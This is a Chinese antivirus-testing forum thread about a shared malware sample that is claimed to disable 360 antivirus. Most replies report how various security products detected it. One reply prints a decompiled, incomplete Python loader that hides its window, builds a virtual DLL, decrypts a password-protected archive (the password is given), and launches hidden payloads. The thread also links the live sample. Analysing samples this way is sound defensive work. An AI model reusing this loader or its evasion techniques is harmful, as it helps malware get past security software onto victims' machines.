查看: 1542|回复: 29
收起左侧

[病毒样本] 1X

  [复制链接]
dght432
发表于 2024-8-7 19:51:05 | 显示全部楼层 |阅读模式
https://www.123pan.com/s/rUVyVv-7YMJ3.html
可以干掉360

评分

参与人数 1经验 +10 收起 理由
QVM360 + 10 版区有你更精彩: )

查看全部评分

swizzer
发表于 2024-8-7 20:01:35 | 显示全部楼层
Avast

NSIS:MalwareX-gen
biue
发表于 2024-8-7 20:09:20 | 显示全部楼层
腾讯电脑管家 1X

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
不知起什么名
发表于 2024-8-7 20:16:30 | 显示全部楼层
火绒 kill
SilentInstaller.exe >> [NSIS].nsi, 病毒名:HEUR:Trojan/Fake.ag, 病毒ID:27c5005a1178cd7c
心醉咖啡
发表于 2024-8-7 20:27:18 | 显示全部楼层
金山毒霸扫描miss
btbtg
发表于 2024-8-7 20:27:45 | 显示全部楼层
干掉之后再启动360杀毒或者腾讯管家都会闪退,打开几次360杀毒就会自动启动急救箱扫描,但是要手动改成强力模式才能扫描到,重启之后360杀毒正常运行

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
aikafans
发表于 2024-8-7 20:49:20 | 显示全部楼层
本帖最后由 aikafans 于 2024-8-7 20:50 编辑

eset 扫描 miss但是双击后内存杀
有联网动作

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
wywt123
发表于 2024-8-7 20:54:18 | 显示全部楼层
  1. import ctypes
  2. import os
  3. import zipfile
  4. TRUE = 1
  5. FALSE = 0
  6. GENERIC_WRITE = 1073741824
  7. FILE_SHARE_READ = 1
  8. FILE_SHARE_WRITE = 2
  9. CREATE_ALWAYS = 2
  10. FILE_ATTRIBUTE_NORMAL = 128
  11. STARTF_USESHOWWINDOW = 1
  12. SW_HIDE = 0
  13. SW_SHOW = 5
  14. kernel32 = ctypes.WinDLL('kernel32', True, **('use_last_error',))
  15. user32 = ctypes.WinDLL('user32', True, **('use_last_error',))

  16. def get_console_window():
  17.     return kernel32.GetConsoleWindow()


  18. def show_window(window_handle, command):
  19.     user32.ShowWindow(window_handle, command)


  20. class STARTUPINFO(ctypes.Structure):
  21.     _fields_ = [
  22.         ('cb', ctypes.c_ulong),
  23.         ('lpReserved', ctypes.c_wchar_p),
  24.         ('lpDesktop', ctypes.c_wchar_p),
  25.         ('lpTitle', ctypes.c_wchar_p),
  26.         ('dwX', ctypes.c_ulong),
  27.         ('dwY', ctypes.c_ulong),
  28.         ('dwXSize', ctypes.c_ulong),
  29.         ('dwYSize', ctypes.c_ulong),
  30.         ('dwXCountChars', ctypes.c_ulong),
  31.         ('dwYCountChars', ctypes.c_ulong),
  32.         ('dwFillAttribute', ctypes.c_ulong),
  33.         ('dwFlags', ctypes.c_ulong),
  34.         ('wShowWindow', ctypes.c_ushort),
  35.         ('cbReserved2', ctypes.c_ushort),
  36.         ('lpReserved2', ctypes.c_void_p),
  37.         ('hStdInput', ctypes.c_void_p),
  38.         ('hStdOutput', ctypes.c_void_p),
  39.         ('hStdError', ctypes.c_void_p)]


  40. class PROCESS_INFORMATION(ctypes.Structure):
  41.     _fields_ = [
  42.         ('hProcess', ctypes.c_void_p),
  43.         ('hThread', ctypes.c_void_p),
  44.         ('dwProcessId', ctypes.c_ulong),
  45.         ('dwThreadId', ctypes.c_ulong)]


  46. def start_process(python_executable, script_path):
  47.     startupinfo = STARTUPINFO()
  48.     process_information = PROCESS_INFORMATION()
  49.     startupinfo.cb = ctypes.sizeof(startupinfo)
  50.     startupinfo.dwFlags = STARTF_USESHOWWINDOW
  51.     startupinfo.wShowWindow = SW_HIDE
  52.     command_line = f'''"{python_executable}" "{script_path}"'''
  53.     success = kernel32.CreateProcessW(None, command_line, None, None, False, 0, None, None, ctypes.byref(startupinfo), ctypes.byref(process_information))
  54.     kernel32.CloseHandle(process_information.hProcess)
  55.     kernel32.CloseHandle(process_information.hThread)


  56. class MemoryStream(ctypes.Structure):
  57.     _fields_ = [
  58.         ('buffer', ctypes.POINTER(ctypes.c_ubyte)),
  59.         ('size', ctypes.c_size_t)]
  60.    
  61.     def __init__(self, initial_size = (1024,)):
  62.         self.size = initial_size
  63.         self.buffer = ctypes.c_ubyte * self.size()

  64.    
  65.     def write(self, data):
  66.         data_size = len(data)
  67.         new_size = self.size + data_size
  68.         new_buffer = ctypes.c_ubyte * new_size()
  69.         ctypes.memmove(new_buffer, self.buffer, self.size)
  70.         ctypes.memmove(ctypes.addressof(new_buffer) + self.size, data, data_size)
  71.         self.buffer = new_buffer
  72.         self.size = new_size

  73.    
  74.     def get_data(self):
  75.         return bytes(self.buffer[:self.size])



  76. def read_encrypted_zip(file_path, password, output_file_path):
  77.     pass
  78. # WARNING: Decompyle incomplete

  79. if __name__ == '__main__':
  80.     console_window = get_console_window()
  81.     show_window(console_window, SW_HIDE)
  82.     dll_path = os.path.abspath('bxsdk64.dll')
  83.     bxsdk64 = ctypes.WinDLL(dll_path)
  84.     bxsdk64.BoxedAppSDK_SetContext.argtypes = [
  85.         ctypes.c_char_p]
  86.     bxsdk64.BoxedAppSDK_SetContext.restype = None
  87.     bxsdk64.BoxedAppSDK_Init.argtypes = []
  88.     bxsdk64.BoxedAppSDK_Init.restype = None
  89.     bxsdk64.BoxedAppSDK_EnableOption.argtypes = [
  90.         ctypes.c_int,
  91.         ctypes.c_int]
  92.     bxsdk64.BoxedAppSDK_EnableOption.restype = None
  93.     bxsdk64.BoxedAppSDK_CreateVirtualFileA.argtypes = [
  94.         ctypes.c_char_p,
  95.         ctypes.c_uint,
  96.         ctypes.c_uint,
  97.         ctypes.c_uint,
  98.         ctypes.c_uint,
  99.         ctypes.c_uint,
  100.         ctypes.c_uint]
  101.     bxsdk64.BoxedAppSDK_CreateVirtualFileA.restype = ctypes.c_void_p
  102.     bxsdk64.BoxedAppSDK_Init()
  103.     tmp_path = 'hello.dll'
  104.     tmp_path_encoded = tmp_path.encode('utf-8')
  105.     bxsdk64.BoxedAppSDK_CreateVirtualFileA(tmp_path_encoded, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)
  106.     read_encrypted_zip('hello.zip', 'laiba', tmp_path)
  107.     current_dir = os.path.dirname(os.path.abspath(__file__))
  108.     python_executable = os.path.join(current_dir, 'python_test.exe')
  109.     script_path = os.path.join(current_dir, 'run_process.avi')
  110.     start_process(python_executable, script_path)
  111.     HELLO_path = os.path.abspath('hello.dll')
  112.     hello_dll = ctypes.WinDLL(HELLO_path)
  113.     hello_dll.StatRun.argtypes = []
  114.     hello_dll.StatRun.restype = None
  115.     hello_dll.StatRun()
复制代码


payload


密码laiba

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
御坂14857号
发表于 2024-8-7 21:14:59 | 显示全部楼层
过智量双击,未拦截任何行为
kaba666
发表于 2024-8-7 21:29:21 | 显示全部楼层
什么辣鸡样本?运行了10多分钟,没见干掉360,卡巴也没反应
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-10 07:26 , Processed in 0.134857 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表